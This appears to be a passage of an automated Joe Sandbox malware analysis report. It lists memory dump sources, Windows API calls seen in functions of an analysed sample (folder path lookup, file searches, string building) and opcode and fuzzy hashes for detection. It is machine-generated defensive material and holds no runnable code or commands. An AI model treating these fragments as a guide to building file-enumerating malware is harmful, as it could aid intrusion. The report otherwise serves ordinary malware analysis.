                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFileNextlstrcat
                                                  • String ID: !=A
                                                  • API String ID: 3840410801-2919091325
                                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                  Function 02F151A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F151E1
                                                  • lstrcat.KERNEL32(?,00421070), ref: 02F151FE
                                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 02F15212
                                                  • lstrcat.KERNEL32(?,00421074), ref: 02F15224
                                                    • Part of subcall function 02F14B77: wsprintfA.USER32 ref: 02F14B93
                                                    • Part of subcall function 02F14B77: FindFirstFileA.KERNEL32(?,?), ref: 02F14BAA
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02F14BD8
                                                    • Part of subcall function 02F14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02F14BEE
                                                    • Part of subcall function 02F14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02F14DE4
                                                    • Part of subcall function 02F14B77: FindClose.KERNEL32(000000FF), ref: 02F14DF9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                  • Instruction ID: 74e6940ce3ea84b2c072da7163ef706c69d98ca71e01f2b1dcc00ed31c01559d
                                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                  • Instruction Fuzzy Hash: 0D21CB7AA402087BC714FBF0DC85EE9337EAB55740F4041887749921D0DE7496C9CF91
                                                  Function 02F194C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 1206339513-0
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: 7732e415561b6b971a877fec92c990d929c17958aed7e27f9f21ee93f5b54ce1
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: BF01C879640108FFCB04DFECD998EAE7BBAEB49394F108148F9099B301C675AA40DB95